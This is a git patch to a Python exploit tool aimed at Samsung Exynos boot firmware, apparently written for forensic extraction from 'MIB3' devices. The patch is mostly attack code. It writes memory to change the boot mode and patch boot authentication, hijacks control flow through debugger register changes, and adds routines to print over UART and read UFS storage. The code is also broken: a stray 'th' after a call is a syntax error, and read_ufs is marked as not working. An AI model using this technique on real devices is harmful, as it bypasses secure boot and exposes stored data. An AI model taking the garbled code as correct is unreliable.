From a7a5bdeb7e2736207099bcb6498a794d7ed29930 Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen <j.herrewijnen@nfi.nl>
Date: Mon, 25 Nov 2024 17:40:39 +0100
Subject: [PATCH] Can print UART address from functoin

---
 source/exploit/exploit.py | 37 ++++++++++++++++++++++++++++++++++---
 1 file changed, 34 insertions(+), 3 deletions(-)

diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index 6cc4095..79809d3 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -838,9 +838,11 @@ class ExynosDevice():
         BL33_AUTH = 0x02024e5c
         if args.MIB3:
             self.cd.memwrite_region(0xcf08aa59, b"\x4c\x44\x46\x58") #58 was 57 in INIT print
-            #self.cd.memwrite_region(0xcf05e2b0, struct.pack('>I', 0x20000014)) # Change bootmode to GPT 
             self.cd.memwrite_region(0xcf026b94, struct.pack('>I', 0x210000b4)) # Change bootmode to GPT
             BL33_AUTH = 0x202ae18 # BL33_LR
+            
+            # Modifying return values to continue boot flow
+            #self.cd.memwrite_region(0xcf05dea8, b"\xa0\x1f\x42\xf8")
 
         self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
         self.cd.restore_stack_and_jump(BL33_AUTH)
@@ -848,11 +850,36 @@ class ExynosDevice():
         time.sleep(1)
         self.usb_read(0x200)
 
+        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
+
+        self.write_uart(DEBUGGER_ADDR, 0xcf4dfb28)th
+
+        # NOT WORKING
         self.read_ufs(DEBUGGER_ADDR)
 
         pass
 
 
+    def write_uart(self, DEBUGGER_ADDR, data_pointer):
+        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
+
+        curr_X0 = self.cd.arch_dbg.state.X0
+        curr_X1 = self.cd.arch_dbg.state.X1
+
+        self.cd.arch_dbg.state.X0 = data_pointer
+        self.cd.arch_dbg.state.X1 = 0x0
+
+        self.cd.restore_stack_and_jump(0xcf05dd6c)
+        time.sleep(0.5)
+        self.connect_device()
+        self.usb_read(0x200)
+
+        self.cd.arch_dbg.state.X0 = curr_X0
+        self.cd.arch_dbg.state.X1 = curr_X1
+        return
+
+
+
     def read_ufs(self, DEBUGGER_ADDR):
         """
         Read UFS
@@ -861,9 +888,13 @@ class ExynosDevice():
         param1 = offset
         """
         self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
-        ufs_read_addr = 0xcf013840
-        self.cd.arch_dbg.state.X4 = 0x155A0000
+        ufs_read_addr = 0xcf00eaf4
+        self.cd.arch_dbg.state.X0 = 0x0
+        self.cd.arch_dbg.state.X1 = 0x1
         self.cd.restore_stack_and_jump(ufs_read_addr)
+
+        time.sleep(1)
+        self.connect_device()
         pass